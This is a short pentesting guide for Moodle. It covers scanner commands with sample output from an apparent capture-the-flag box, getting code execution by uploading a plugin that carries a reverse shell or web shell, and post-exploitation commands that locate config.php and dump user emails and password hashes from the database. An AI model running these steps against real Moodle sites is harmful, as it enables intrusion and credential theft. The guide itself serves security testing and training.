# Moodle ## Automatic Scans ### droopescan ```bash pip3 install droopescan droopescan scan moodle -u http://moodle.example.com// [+] Plugins found: forum http://moodle.schooled.htb/moodle/mod/forum/ http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt http://moodle.schooled.htb/moodle/mod/forum/version.php [+] No themes found. [+] Possible version(s): 3.10.0-beta [+] Possible interesting urls found: Static readme file. - http://moodle.schooled.htb/moodle/README.txt Admin panel - http://moodle.schooled.htb/moodle/login/ [+] Scan finished (0:00:05.643539 elapsed) ``` ### moodlescan ```bash #Install from https://github.com/inc0d3/moodlescan python3 moodlescan.py -k -u http://moodle.example.com// Version 0.7 - Dic/2020 ............................................................................................................. By Victor Herrera - supported by www.incode.cl ............................................................................................................. Getting server information http://moodle.schooled.htb/moodle/ ... server : Apache/2.4.46 (FreeBSD) PHP/7.4.15 x-powered-by : PHP/7.4.15 x-frame-options : sameorigin last-modified : Wed, 07 Apr 2021 21:33:41 GMT Getting moodle version... Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta Searching vulnerabilities... Vulnerabilities found: 0 Scan completed. ``` ### CMSMap ```bash pip3 install cmsmap cmsmap http://moodle.example.com/ ``` ### CVEs I found that the automatic tools are pretty **useless finding vulnerabilities affecting the moodle version**. You can **check** for them in [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle)\*\*\*\* ## **RCE** You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab**:** ![](../../.gitbook/assets/image%20%28449%29.png) If you are manager you may still need to **activate this option**. You can see how ins the moodle privilege escalation PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321). Then, you can **install the following plugin** that contains the classic pentest-monkey php r**ev shell** \(_before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again_\) {% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %} Or you could use the plugin from [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle_RCE) to get a regular PHP shell with the "cmd" parameter. To access launch the malicious plugin you need to access to: ```bash http://domain.com//blocks/rce/lang/en/block_rce.php?cmd=id ``` ## POST ### Find database credentials ```bash find / -name "config.php" 2>/dev/null | grep "moodle/config.php" ``` ### Dump Credentials from database ```bash /usr/local/bin/mysql -u --password= -e "use moodle; select email,username,password from mdl_user; exit" ```